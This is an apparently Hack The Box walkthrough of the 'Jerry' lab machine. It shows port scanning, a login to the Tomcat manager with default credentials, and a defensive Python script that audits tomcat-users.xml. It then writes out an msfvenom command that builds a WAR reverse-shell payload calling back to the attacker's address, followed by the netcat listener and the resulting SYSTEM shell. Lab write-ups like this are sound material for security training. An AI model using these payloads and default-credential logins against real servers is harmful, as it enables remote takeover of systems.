Jerry

Summary:

This was a straightforward and easy box. It lets you practice the fundamentals of hacking, which makes it perfect for someone new to the field.

Enumeration

Service Scan

We start with a service scan to discover open ports, services and applications running in the background, so that we are aware of the infrastructure and of possibly hidden services of interest that might let us disclose information or gain a foothold.

$ nmap -A -p-65535 jerry               
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-07 05:22 EDT
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.40% done
Nmap scan report for jerry (10.10.10.95)
Host is up (0.049s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|2008|2016|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Port 8080

We’re greeted by a Tomcat index page.

Nmap reports a possible redirection, so I thought to run the web application through a Burp proxy and got interesting findings in the response message.

    <h3>Managing Tomcat</h3>
        <p>For security, access to the <a href="/manager/html">manager webapp</a> is restricted.
            Users are defined in
        </p>

        <pre> $CATALINA_HOME/conf/tomcat-users.xml </pre>
        <p>

Additionally, I ran a directory bruteforce to discover possibly hidden directories that could be used to our advantage.

Browsing to the discovered /manager directory, we are asked for credentials in order to authenticate. Clicking the “Cancel” button in Firefox or Chrome redirects us to a 401 page that shows the default credentials as an example.

Typing those credentials into the authentication prompt reveals a default-credential misconfiguration, and we are logged into the manager application.
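As an added defensive check that is not part of the original writeup, the script below audits a tomcat-users.xml (the file the index page points at) for the conditions that make this box exploitable: manager roles granted to shipped example account names, plaintext passwords, and manager-gui combined with manager-script. The sample XML and its CHANGEME password are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: stock example accounts uncommented and given manager roles,
# which is the misconfiguration that hands over the manager webapp.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="CHANGEME" roles="manager-gui,manager-script"/>
  <user username="deployer" password="5f4dcc3b5aa765d61d8327deb882cf99" roles="manager-script"/>
  <user username="viewer" password="CHANGEME" roles="manager-status"/>
</tomcat-users>
"""

MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}
# Usernames used by the commented-out example entries in the stock tomcat-users.xml.
SHIPPED_EXAMPLE_USERS = {"tomcat", "both", "role1"}
# A digested credential is hex, optionally prefixed with salt$iterations$ (MessageDigestCredentialHandler).
DIGEST_RE = re.compile(r"^(?:[0-9a-f]+\$\d+\$)?[0-9a-f]{32,128}$", re.I)


def audit_tomcat_users(xml_text):
    """Return a list of (username, finding) tuples describing risky manager accounts."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if elem.tag.split("}")[-1] != "user":  # strip the XML namespace before comparing
            continue
        name = elem.get("username", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        pwd = elem.get("password", "")
        granted = roles & MANAGER_ROLES
        if granted:
            findings.append((name, "has manager/admin role(s): " + ",".join(sorted(granted))))
        if name in SHIPPED_EXAMPLE_USERS:
            findings.append((name, "shipped example account name is enabled"))
        if pwd and not DIGEST_RE.match(pwd):
            findings.append((name, "password stored in plaintext (no CredentialHandler digest)"))
        if {"manager-gui", "manager-script"} <= roles:
            findings.append((name, "manager-gui and manager-script on one account weakens the CSRF protection"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {finding}")
```

Run it against $CATALINA_HOME/conf/tomcat-users.xml on a real deployment by reading the file into audit_tomcat_users.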

In another hacking writeup, I remember exploiting the WAR file upload functionality to gain a shell. Herein, I am using “msfvenom” to create a file which when executed, will open a reverse shell connection to my netcat listener.

$ msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.6 LPORT=1234 -f war -o thebigslap.war
Payload size: 13319 bytes
Final size of war file: 13319 bytes
Saved as: thebigslap.war

Open a netcat listener to catch the incoming connection after we deploy and open the WAR file.

$ nc -nvlp 1234                                                                          
listening on [any] 1234 ...

Upload the WAR file and click the Deploy button. The file should then appear among the applications listed on the manager’s main page. Click on it to open the file, then check netcat for the incoming connection. Below, the shell shows that we have SYSTEM privileges:

  • “The system account and the administrator account (Administrators group) have the same file privileges, but they have different functions. The system account is used by the operating system and by services that run under Windows”
$ nc -nvlp 1234                                                                          
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.95] 49194
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop\flags>type *
type *

2 for the price of 1.txt


user.txt
<FLAG:7004dbc...deleted>

root.txt
<FLAG:04a8b36...deleted>
